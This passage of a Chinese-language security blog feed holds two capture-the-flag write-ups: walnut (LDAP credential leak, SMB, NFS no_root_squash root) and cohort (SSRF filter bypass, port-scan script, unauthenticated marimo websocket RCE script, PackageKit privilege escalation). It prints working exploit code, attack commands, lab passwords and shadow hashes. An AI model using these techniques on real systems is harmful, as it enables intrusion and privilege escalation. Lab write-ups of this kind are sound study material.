dn: cn=automation,ou=Groups,dc=walnut,dc=local
objectClass: posixGroup
cn: miners
cn: automation
gidNumber: 7789
memberUid: automation

# briangeoff, Groups, walnut.local
dn: cn=briangeoff,ou=Groups,dc=walnut,dc=local
objectClass: posixGroup
cn: miners
cn: briangeoff
gidNumber: 1000
memberUid: briangeoff

# larryburns, Groups, walnut.local
dn: cn=larryburns,ou=Groups,dc=walnut,dc=local
objectClass: posixGroup
cn: miners
cn: larryburns
gidNumber: 1001
memberUid: larryburns

# automation, People, walnut.local
dn: uid=automation,ou=People,dc=walnut,dc=local
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
uid: automation
sn: automation
givenName: automation
cn: automation
displayName: automation
uidNumber: 7789
gidNumber: 7789
gecos: automation
loginShell: /bin/bash
homeDirectory: /home/automation
description: old pw asdh023incasdahff9 please change pw on all servers

# briangeoff, People, walnut.local
dn: uid=briangeoff,ou=People,dc=walnut,dc=local
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
uid: briangeoff
sn: Geoff
givenName: Brian
cn: briangeoff
displayName: briangeoff
uidNumber: 1000
gidNumber: 1000
gecos: Brian Geoff
loginShell: /bin/bash
homeDirectory: /home/briangeoff

# larryburns, People, walnut.local
dn: uid=larryburns,ou=People,dc=walnut,dc=local
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
uid: larryburns
sn: Burns
givenName: Larry
cn: larryburns
displayName: larryburns
uidNumber: 1001
gidNumber: 1001
gecos: Larry Burns
loginShell: /bin/bash
homeDirectory: /home/larryburns
userPassword:: e1NTSEF9amdUN0V4SEtocDVDQm92clBaYzhMYkJiNXVwK1JNcUI=

# search result
search: 2
result: 0 Success

# numResponses: 10
# numEntries: 9
</code></pre>
<p>两条信息:</p>
<ol>
<li><code>larryburns</code> 的 base64 后的 <a href="https://www.openldap.org/faq/data/cache/347.html">SSHA</a> hash: <code>e1NTSEF9amdUN0V4SEtocDVDQm92clBaYzhMYkJiNXVwK1JNcUI=</code></li>
<li><code>automation</code> 以及其密码: <code>asdh023incasdahff9</code></li>
</ol>
<h1>auth as automation</h1>
<p>考虑重新枚举 smb:</p>
<pre><code>nxc smb 10.1.165.102 -u 'automation' -p 'asdh023incasdahff9' --shares
SMB         10.1.165.102    445    WALNUT           [*] Unix - Samba (name:WALNUT) (domain:local) (signing:False) (SMBv1:None) (Null Auth:True)
SMB         10.1.165.102    445    WALNUT           [+] local\automation:asdh023incasdahff9
SMB         10.1.165.102    445    WALNUT           [*] Enumerated shares
SMB         10.1.165.102    445    WALNUT           Share           Permissions     Remark
SMB         10.1.165.102    445    WALNUT           -----           -----------     ------
SMB         10.1.165.102    445    WALNUT           print$          READ            Printer Drivers
SMB         10.1.165.102    445    WALNUT           automation      READ,WRITE      automation share
SMB         10.1.165.102    445    WALNUT           IPC$                            IPC Service (walnut server (Samba, Ubuntu))
</code></pre>
<p>可以读写 <code>automation</code> 共享</p>
<h2>share:automation</h2>
<p>实话实说, 我脑子抽了, 第一时间居然没有直接尝试密码登陆 ssh, 先读取共享:</p>
<pre><code>smbclient -U walnut.local/automation%asdh023incasdahff9 \\\\walnut.local\\automation
Try "help" to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Sat Sep  5 07:49:24 2026
  ..                                  D        0  Sat Sep  5 07:49:24 2026
  .bash_history                       H       10  Sun Aug 30 09:04:58 2026
  scripts                             D        0  Thu Sep 18 16:28:59 2025
  .ssh                               DH        0  Fri Sep 19 09:39:26 2025
  .hidden                            DH        0  Thu Sep 18 15:22:44 2025
  .cache                             DH        0  Thu Sep 18 09:38:52 2025
  .lesshst                            H       20  Thu Sep 18 15:24:25 2025
  user.txt                            N       33  Sun Aug 30 08:53:47 2026
  .viminfo                            H    11817  Thu Sep 18 16:28:59 2025

		8408452 blocks of size 1024. 2714392 blocks available
smb: \&gt; cd .ssh
smb: \.ssh\&gt; ls
  .                                   D        0  Fri Sep 19 09:39:26 2025
  ..                                  D        0  Sat Sep  5 07:49:24 2026
  id_rsa.pub                          N      576  Thu Sep 18 09:12:15 2025
  id_rsa                              N     2610  Thu Sep 18 09:12:15 2025
  authorized_keys                     N      576  Fri Sep 19 09:39:26 2025

		8408452 blocks of size 1024. 2714392 blocks available
smb: \.ssh\&gt; get id_rsa
getting file \.ssh\id_rsa of size 2610 as id_rsa (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
</code></pre>
<p>进入是 automation 的家目录, 有 ssh 私钥, 下载并登陆, 不需要 prase</p>
<h1>shell as automation</h1>
<p>一些身份枚举以及系统枚举, 一些原始枚举的输出找不到了, 但 <code>sudo -l</code> 和 <code>suid</code> 都没什么有用的.</p>
<pre><code>automation@walnut:~$ whoami
automation
automation@walnut:~$ id
uid=7789(automation) gid=7789(automation) groups=7789(automation)

automation@walnut:~$ cat /etc/passwd|grep 'sh$'
root:x:0:0:root:/root:/bin/bash
automation:x:7789:7789::/home/automation:/bin/bash
localjob1:x:5000:5000:,,,:/home/localjob1:/bin/bash
localjob2:x:5001:5001:,,,:/home/localjob2:/bin/bash
localjob3:x:5002:5002:,,,:/home/localjob3:/bin/bash
localjob4:x:5003:5003:,,,:/home/localjob4:/bin/bash

automation@walnut:~$ ls /etc/cron*
/etc/crontab
/etc/cron.d:
e2scrub_all  sysstat
/etc/cron.daily:
apport	apt-compat  dpkg  logrotate  man-db  sysstat
/etc/cron.hourly:
/etc/cron.monthly:
/etc/cron.weekly:
man-db
/etc/cron.yearly:

automation@walnut:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root	cd / &amp;&amp; run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.daily; }
47 6	* * 7	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.weekly; }
52 6	1 * *	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.monthly; }
</code></pre>
<p>网络情况:</p>
<pre><code>automation@walnut:~$ ip a
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 12:42:25:31:9a:f7 brd ff:ff:ff:ff:ff:ff
    altname enp0s5
    altname ens5
    inet 10.1.165.102/18 metric 100 brd 10.1.191.255 scope global dynamic eth0
       valid_lft 3273sec preferred_lft 3273sec
    inet6 fe80::1042:25ff:fe31:9af7/64 scope link
       valid_lft forever preferred_lft forever
automation@walnut:~$ ss -lntp
State      Recv-Q     Send-Q          Local Address:Port            Peer Address:Port     Process
LISTEN     0          64                    0.0.0.0:43905                0.0.0.0:*
LISTEN     0          4096                  0.0.0.0:60383                0.0.0.0:*
LISTEN     0          4096            127.0.0.53%lo:53                   0.0.0.0:*
LISTEN     0          4096                  0.0.0.0:42371                0.0.0.0:*
LISTEN     0          2048                  0.0.0.0:389                  0.0.0.0:*
LISTEN     0          50                    0.0.0.0:445                  0.0.0.0:*
LISTEN     0          4096               127.0.0.54:53                   0.0.0.0:*
LISTEN     0          50                    0.0.0.0:139                  0.0.0.0:*
LISTEN     0          64                    0.0.0.0:2049                 0.0.0.0:*
LISTEN     0          4096                  0.0.0.0:45069                0.0.0.0:*
LISTEN     0          4096                  0.0.0.0:22                   0.0.0.0:*
LISTEN     0          4096                  0.0.0.0:60497                0.0.0.0:*
LISTEN     0          4096                  0.0.0.0:111                  0.0.0.0:*
LISTEN     0          4096                     [::]:54925                   [::]:*
LISTEN     0          2048                     [::]:389                     [::]:*
LISTEN     0          4096                     [::]:35249                   [::]:*
LISTEN     0          4096                     [::]:43451                   [::]:*
LISTEN     0          50                       [::]:445                     [::]:*
LISTEN     0          64                       [::]:40445                   [::]:*
LISTEN     0          50                       [::]:139                     [::]:*
LISTEN     0          64                       [::]:2049                    [::]:*
LISTEN     0          4096                     [::]:58373                   [::]:*
LISTEN     0          4096                     [::]:22                      [::]:*
LISTEN     0          4096                     [::]:111                     [::]:*
</code></pre>
<p>没什么仅限本地的有趣端口</p>
<p>对于 NFS 配置, 解释了为什么枚举中没有发现 NFS 共享</p>
<pre><code>automation@walnut:~/scripts$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
</code></pre>
<p>整体下来提权路径很明朗: 先找到一个有特殊 sudo 权限的用户, 然后顺水推舟.</p>
<h2>script</h2>
<p>对 <code>script</code> 文件夹以及其中文件做分析:</p>
<pre><code>automation@walnut:~/scripts$ ls
logs  runScript.sh
automation@walnut:~/scripts$ cat runScript.sh
#!/bin/bash

PARM1="$1"
PARM2=`echo -n "$1" | md5sum | cut -d' ' -f 1`
PARM3="$2"
DATE=`date +%d.%m.%Y-%Hh%m.%S`

su - "$PARM1" -c "$PARM3" &lt; /home/automation/.hidden/"$PARM2" &gt; /home/automation/scripts/logs/"$1"-"$DATE".log
</code></pre>
<p>其将 <code>~/.hidden</code> 文件夹中与用户名的 md5 匹配的文件中的内容作为密码, 使用 sudo 以该用户身份之情命令并写入 log.</p>
<p>密码:</p>
<pre><code>automation@walnut:~/scripts$ ls -licah ~/.hidden
total 24K
393416 drwx------ 2 automation automation 4.0K Sep 18  2025 .
394053 drwxr-x--- 6 automation automation 4.0K Sep  5 11:49 ..
393419 -rw------- 1 automation automation   21 Sep 19  2025 4f378611beed879f4f62a43ac18452a9
393418 -rw------- 1 automation automation   21 Sep 19  2025 af5f60ab1fe78c4a34e37c9cb4cc58b8
393440 -rw------- 1 automation automation   21 Sep 19  2025 b410af005ed0c033fd5e89720fdf2d57
393438 -rw------- 1 automation automation    0 Sep 19  2025 b4d2ab0ea77f3306355ac7b2bcfcd614
393439 -rw------- 1 automation automation   21 Sep 19  2025 b4d2ab0ea77f3306355ac7b2bcfcd614.bak
automation@walnut:~/scripts$ cat ~/.hidden/*
brYfZknjTirtrPgM8V65
cKvFZVPbrxEqCkCLPM70
Q8NPUgCvuBQ636tzFBh3
vyZzRcreRGDjbq9t19Tb
</code></pre>
<p>系统中一共还有 4 个用户:</p>
<pre><code>localjob1:x:5000:5000:,,,:/home/localjob1:/bin/bash
localjob2:x:5001:5001:,,,:/home/localjob2:/bin/bash
localjob3:x:5002:5002:,,,:/home/localjob3:/bin/bash
localjob4:x:5003:5003:,,,:/home/localjob4:/bin/bash
</code></pre>
<h1>shell as localjob3</h1>
<p>起对应密码为: <code>vyZzRcreRGDjbq9t19Tb</code>
只有该用户的 sudo 权限有有价值信息:</p>
<pre><code>localjob3@walnut:/home/localjob1$ sudo -l
Matching Defaults entries for localjob3 on walnut:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User localjob3 may run the following commands on walnut:
    (ALL) NOPASSWD: /usr/bin/systemctl restart nfs-kernel-server.service

</code></pre>
<h2>NFS no_root_squash</h2>
<p>可以重启 NFS 服务, 查看 <code>/etc/expots</code> 权限, 其应用了 <a href="https://www.redhat.com/en/blog/linux-access-control-lists">facl</a>, 是一套独立于 RWX 权限的权限系统, 设置了 facl 的文件会在 RWX 条后有一个 <code>+</code></p>
<pre><code>localjob3@walnut:/home/localjob1$ ls -liah /etc/exports
131666 -rw-rw-r--+ 1 root root 390 Sep 19  2025 /etc/exports
localjob3@walnut:/home/localjob1$ getfacl /etc/exports
getfacl: Removing leading '/' from absolute path names
# file: etc/exports
# owner: root
# group: root
user::rw-
user:localjob3:rw-
group::r--
mask::rw-
other::r--
</code></pre>
<p>也就是说, <code>localjob3</code> 可以修改配置文件, 即可以应用 <code>no_root_squash</code> 攻击:</p>
<pre><code>localjob3@walnut:~$ mkdir share &amp;&amp; cp /bin/bash ./share/bash
localjob3@walnut:~$ echo  "/home/localjob3/share *(rw,sync,no_root_squash)" |tee -a /etc/exports
localjob3@walnut:~$ sudo /usr/bin/systemctl restart nfs-kernel-server.service
</code></pre>
<p>在 kali 上:</p>
<pre><code>┌──(stackcat㉿r1ngz0ps)-[~/Documents/hs]
└─$ showmount -e 10.1.165.102
Export list for 10.1.165.102:
/home/localjob3/share *
┌──(stackcat㉿r1ngz0ps)-[~/Documents/hs]
└─$ sudo mount -t nfs 10.1.165.102:/home/localjob3/share ./mntf
┌──(root㉿r1ngz0ps)-[/home/stackcat/Documents/hs/mntf]
└─# chown root:root ./bash
┌──(root㉿r1ngz0ps)-[~stackcat/Documents/hs/mntf]
└─# chmod +s ./bash
</code></pre>
<p>最终:</p>
<pre><code>localjob3@walnut:~/share$ ./bash -p
bash-5.2#
</code></pre>
<h1>shell as root</h1>
<p>战利品:</p>
<pre><code># shadow
root:$y$j9T$UmHpSRJ1qYhfOG.6OldZb0$38vr3gUa/TG0MNy2wP2uaV6.8fabfuke8zNISI6OTz8:20349:0:99999:7:::
automation:$y$j9T$yqyYXRhOd4JXhInaH1jld.$htBpZ7ZX7F3i2IKk6gepQYtycBmmMVZCMTF1mJtsvJ6:20349:0:99999:7:::
localjob1:$y$j9T$EXOQyoid/RmZ4/TUFCeYO.$Gbjs4bdHF7qhnu.MHUlxkeajzpusoxJy9CDvtLCXsy7:20349:0:99999:7:::
localjob2:$y$j9T$Nw35eg19DdYPlFCdHI3Je0$YQTZzYi7SQhfe8QljhLQIuVm6qTpbgNbHviA..AGr4C:20349:0:99999:7:::
localjob3:$y$j9T$Q6.FspfyxeK/ywvwCI3sO/$bROALBbdSEicj2I4SsuVBDvJOOkT8l51OFzyksxlWB0:20349:0:99999:7:::
localjob4:$y$j9T$50HSZtw65e0OKhxplqTDW/$3GAD.jOpjVoYs9fYL7xwX7n/S.SeW/g3HzVR.ZQLq72:20349:0:99999:7:::

# flags
c3dcdda3950b1eca68477ce65da82392
f42a447b64f431b99d7fe59f65f71bc7
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="hacksmater-writeup"/>
  </entry>
  <entry>
    <title>cohort-htb</title>
    <link href="https://0x5t4ckc47.github.io/posts/cohort-htb/cohort-htb/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/cohort-htb/cohort-htb/</id>
    <published>2026-08-05T00:00:00.000Z</published>
    <updated>2026-08-05T00:00:00.000Z</updated>
    <summary>linpeas is the god</summary>
    <content type="html"><![CDATA[<h1>Recon</h1>
<pre><code>22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.18 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN9Ju3bTZsFozwXY1B2KIlEY4BA+RcNM57w4C5EjOw1QegUUyCJoO4TVOKfzy/9kd3WrPEj/FYKT2agja9/PM44=
|   256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH9qI0OvMyp03dAGXR0UPdxw7hjSwMR773Yb9Sne+7vD
80/tcp  open  http     syn-ack ttl 63 nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to https://cohort.htb/
| http-methods:
|_  Supported Methods: POST OPTIONS
443/tcp open  ssl/http syn-ack ttl 63 nginx 1.24.0 (Ubuntu)
| tls-alpn:
|   http/1.1
|   http/1.0
|_  http/0.9
| ssl-cert: Subject: commonName=cohort.htb/organizationName=Cohort Analytics
| Subject Alternative Name: DNS:cohort.htb, DNS:*.cohort.htb
</code></pre>
<p>ttl 63: Linux 机器的预期一跳后数值, 服务运行在 Host 上</p>
<h1>443 - cohort.htb</h1>
<p>80 无法访问, 推测为类似 http转https 架构, 访问 443 得到域名: <code>cohort.htb</code></p>
<p><img src="./443-main.png" alt="web-main" /></p>
<p>一家做分析的公司, 主页有两个公司内人名:</p>
<ol>
<li>Mara Quinteros</li>
<li>Devin Oyelaran</li>
</ol>
<h2>Tech Stack</h2>
<pre><code>HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Wed, 05 Aug 2026 13:52:59 GMT
Content-Type: text/html
Last-Modified: Mon, 01 Jun 2026 20:53:47 GMT
Connection: keep-alive
ETag: W/"6a1df15b-38c"
Content-Length: 908
</code></pre>
<p>Web 基础设施为 Nginx, 可能反向代理着另一个子域名, 子域名扫描无结果</p>
<pre><code>________________________________________________
 :: Method           : GET
 :: URL              : https://10.129.25.193:443
 :: Wordlist         : FUZZ: /opt/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.cohort.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 20
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [20000/20000] :: Job [1/1] :: 44 req/sec :: Duration: [0:57:51] :: Errors: 218 ::
</code></pre>
<h2>SSRF on protal.html</h2>
<p>网页上有一个数据源测试页面, 输入一个 URL, 服务器尝试 fetch 并返回结果, 还能选格式, 挺贴心的:
<img src="./protal-html.png" alt="protal-html" /></p>
<pre><code>goshs -i utun4 -p 1337
WARNING[2026-08-05 22:02:49] There is a newer Version (v2.1.5) of goshs available. Run --update to update goshs.
  __ _  ___  ___| |__  ___
 / _` |/ _ \/ __| '_ \/ __|
| (_| | (_) \__ \ | | \__ \
 \__, |\___/|___/_| |_|___/
  __/ |
 |___/              v2.0.3

INFO   [2026-08-05 22:02:49] Download embedded file at: /example.txt?embedded
INFO   [2026-08-05 22:02:49] Serving on 10.10.17.92:1337
INFO   [2026-08-05 22:02:49] Serving HTTP from /Users/r3vert/0x5t4ckc47/box/htb/cohort
ERROR  [2026-08-05 22:03:16] 10.129.25.193:34564 - [404] - "GET /test HTTP/1.1"
</code></pre>
<p>请求格式如下, 省略一些不必要标头:</p>
<pre><code>POST /api/validate HTTP/1.1
Host: cohort.htb
Referer: https://cohort.htb/portal.html
Content-Type: application/json
Content-Length: 54
Origin: https://cohort.htb
Connection: keep-alive

{"url":"http://10.10.17.92:1337/test","format":"json"}
</code></pre>
<p>测试 SSRF, 过滤了一些地址, 拿速查单喂它:</p>
<pre><code>{"ok": false, "message": "Internal or loopback addresses are not permitted."}
</code></pre>
<p>经过测试 <code>http://0x7f.0x0.0x0.0x1:80/</code> 可行, 当请求可到达与不可到达时分别为:</p>
<pre><code>{"ok": true, "fetched_status": 200, "content_type": "text/html", "preview": "....", "message": "Source reachable."}
{"ok": false, "message": "Could not reach the source: [Errno 111] Connection refused"}
</code></pre>
<p>尝试测试内部端口, 让 grok 生成了一串最常用 web端口:</p>
<pre><code>import requests
from time import sleep

url = 'https://cohort.htb/api/validate'
openport = []
def checkport(port):
    data = {
        "url": f'http://0x7f.0x0.0x0.0x1:{port}',
        "format": "json"
    }
    r = requests.post(url, json=data, verify=False)
    print(r.json())
    if "Could not reach the source:" in r.json()["message"]:
        print(f'{port} no')
    else:
        print(f'{port} yes')
        print(r.json())
        openport.append(port)

def attack():
    with open("./ports", "r") as f:
        for line in f:
            checkport(int(line))
            sleep(0.1)
    print(openport)
attack()
</code></pre>
<p>由于 python 会给出一个超长警告, 就不展示原始输出, 最后探测出以下端口: <code>80</code>, <code>443</code>, <code>5000</code>, <code>8888</code></p>
<pre><code>// 5000
{'ok': True, 'fetched_status': 405, 'content_type': 'application/json', 'preview': '{"ok": false, "message": "Method not allowed."}', 'message': 'Source responded with an error status.'}
// 80
{'ok': True, 'fetched_status': 200, 'content_type': 'text/html', 'preview': '&lt;!doctype html&gt;\n&lt;html lang="en"&gt;\n&lt;head&gt;\n&lt;meta charset="utf-8"&gt;\n&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;\n&lt;title&gt;Cohort Analytics...', 'message': 'Source reachable.'}
// 8888
{'ok': True, 'fetched_status': 200, 'content_type': 'text/html; charset=utf-8', 'preview': '&lt;form method="POST" action="/auth/login"... ', 'message': 'Source reachable.'}
</code></pre>
<p>从 HTML 代码来看 80 的内容与 443 无区别, 5000 则是连 <code>get</code> 请求都不接受, 转向 <code>8888</code>
但目标 web 基础设施为 nginx, 其根据 vhosts 进行反向代理, 我们需要知道 vhosts</p>
<p>当我搜索所有 nginx 会附加到 web 上的页面时, gemini 提供了一条有趣的信息, <code>Stub Status Page</code> 看起来像一个 debug 页面, 虽然其不是默认开启, 但值得尝试
:::tips
Stub Status Page: A minimal, plain-text status page enabled via the stub_status directive. It provides real-time metrics on current active connections, accepted requests, and reading/writing tasks.
:::</p>
<p>搜索 <code>Stub Status Page</code> 又发现了这个页面: https://nginx.org/en/docs/http/ngx_http_status_module.html</p>
<p>其指出该页面在 <code>/status</code> 或 <code>/status.html</code>, 经过测试只有 <code>80</code> 返回了结果:</p>
<pre><code>{"service":"cohort-edge","status":"ok","generated_by":"nginx","upstreams":[{"name":"marketing","host":"cohort.htb","root":"/var/www/cohort"},{"name":"insights-api","host":"cohort.htb","path":"/api/","target":"127.0.0.1:5000"},{"name":"notebooks","host":"nb-1be3782a8afd3ad5.cohort.htb","target":"127.0.0.1:8888","note":"internal analyst workspace, not for external use"}]}
</code></pre>
<p>其指出以下内容:</p>
<ol>
<li><code>5000</code> insights-api 对应 <code>cohort.htb/api</code> 下的内容, 也是上文存在 ssrf 的 api</li>
<li><code>8888</code> notebooks, 对应 <code>nb-1be3782a8afd3ad5.cohort.htb</code> 一个未知程序</li>
</ol>
<h1>nb-1be3782a8afd3ad5.cohort.htb</h1>
<p>添加 hosts, 点开是一个登陆框
<img src="./notebook-main.png" alt="notebook-main" /></p>
<h2>Tech stack</h2>
<pre><code>HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Wed, 05 Aug 2026 15:17:43 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
vary: Cookie
Content-Length: 1304
</code></pre>
<p>HTTP 头没什么有趣信息, 但页面标题指出这是一个 <code>marimo</code> , 一个 AI 驱动的在线 notebook 应用</p>
<pre><code>&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;title&gt;marimo&lt;/title&gt;
&lt;/head&gt;
</code></pre>
<h2>CVE-2026-39987</h2>
<p>一个已知程序, 搞不定登陆, 转向公开利用, 搜索后聚焦在 CVE-2026-39987</p>
<p>用 github issues 上的 poc 测试, 修正一下 ssl 问题并添加交互:</p>
<pre><code>import websocket
import time
import ssl
# Connect without any authentication
url = "wss://nb-1be3782a8afd3ad5.cohort.htb/terminal/ws"
ws = websocket.create_connection(url, sslopt={"cert_reqs": ssl.CERT_NONE})
time.sleep(2)
# Drain initial output
try:
    while True:
        ws.settimeout(1)
        ws.recv()
except:
    pass
# Execute arbitrary command
ws.settimeout(10)
while True:
    c = input("cmd$")
    ws.send(c + '\r')
    print(ws.recv()) 
ws.close()
</code></pre>
<p>实话实说我没想明白为什么改成交互式后命令是可以被执行的但之前不行, 或许是按回车的 <code>\n</code></p>
<h1>shell as marimo</h1>
<p>一些枚举, 很不幸, 由于 <code>marimo</code> 的 shell 配置为 <code>nologin</code>, 其无法通过 ssh 登陆;</p>
<pre><code>(remote) marimo@cohort:/var/www/cohort$ id
uid=1000(marimo) gid=1000(marimo) groups=1000(marimo)
(remote) marimo@cohort:/var/www/cohort$ cat /etc/passwd|grep 'sh$'
root:x:0:0:root:/root:/bin/bash
(remote) marimo@cohort:/var/www/cohort$ find / -type f -perm -04000  2&gt;/dev/null
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mount
/usr/bin/su
/usr/bin/chsh
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
(remote) marimo@cohort:/var/www/cohort$ systemctl list-timers
NEXT                            LEFT LAST                              PASSED UNIT                           ACTIVATES
Wed 2026-08-05 16:20:00 UTC     8min Wed 2026-08-05 16:10:12 UTC  1min 0s ago sysstat-collect.timer          sysstat-collect.service
... all standard
(remote) marimo@cohort:/var/www/cohort$ env
SHELL=/bin/bash
HISTCONTROL=ignorespace
MEMORY_PRESSURE_WRITE=c29tZSAyMDAwMDAgMjAwMDAwMAA=
PWD=/var/www/cohort
LOGNAME=marimo
MARIMO_SKIP_UPDATE_CHECK=1
SYSTEMD_EXEC_PID=1628
HOME=/home/marimo
...
(remote) marimo@cohort:/var/www/cohort$ crontab -l
no crontab for marimo
(remote) marimo@cohort:/var/www/cohort$ cat /etc/crontab
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
17 *	* * *	root	cd / &amp;&amp; run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.daily; }
47 6	* * 7	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.weekly; }
52 6	1 * *	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.monthly; }
#
(remote) marimo@cohort:/var/www/cohort$ ps -ef
...
marimo      1628  0.2  1.4 290636 58852 ?        Ssl  13:01   0:33 /opt/marimo/venv/bin/python3 /opt/marimo/venv/bin/marimo edit /home/marimo/notebooks/retention.py --headless --host 127.0.0.1 -p 8888 --token --token-password YKQ6iPyO5kusNx0BpVAPfjP5 --skip-update-check --no-sandbox
...
</code></pre>
<p>没什么有趣的进程, 可以从notebook进程中提取出来token: <code>YKQ6iPyO5kusNx0BpVAPfjP5</code>, 但无法用于密码复用</p>
<p>网络情况:</p>
<pre><code>(remote) marimo@cohort:/home/marimo$ ip a
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:ca:97 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.25.193/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2007sec preferred_lft 2007sec
    inet6 dead:beef::250:56ff:feb9:ca97/64 scope global dynamic mngtmpaddr
       valid_lft 86391sec preferred_lft 14391sec
    inet6 fe80::250:56ff:feb9:ca97/64 scope link
       valid_lft forever preferred_lft forever

(remote) marimo@cohort:/home/marimo$ ss -ltnp
  State         Local Address:Port
  LISTEN        127.0.0.1:39845
  LISTEN        127.0.0.1:5000
  LISTEN        0.0.0.0:443
  LISTEN        0.0.0.0:80
  LISTEN        127.0.0.1:8888
  LISTEN        0.0.0.0:22
  LISTEN        127.0.0.54:53
  LISTEN        127.0.0.53%lo:53
  LISTEN        [::]:22

</code></pre>
<h2>Pack2TheRoot - CVE-2026-41651</h2>
<p>我运行了 linpeas, 它给出了一条有趣的漏洞利用:</p>
<pre><code>╔══════════╣ Checking for PackageKit Pack2TheRoot (CVE-2026-41651) (T1068)
╚ https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html
PackageKit version detected: 1.2.8-2ubuntu1.2
Vulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit 1.2.8-2ubuntu1.2 is below the Ubuntu 24.04 fixed version: 1.2.8-2ubuntu1.5
</code></pre>
<p>公开 POC 如下: https://github.com/Vozec/CVE-2026-41651</p>
<p>download, chmod, runit and root3d!</p>
<pre><code>(remote) marimo@cohort:/home/marimo$ ./exp-donot-run-it
═══════════════════════════════════════════════════
 CVE-2026-41651 — PackageKit TOCTOU LPE
═══════════════════════════════════════════════════
[*] Building packages (pure C)...
[+] dummy   : /tmp/.pk-dummy-58888.deb
[+] payload : /tmp/.pk-payload-58888.deb
[*] Transaction : /2_ecadeeac
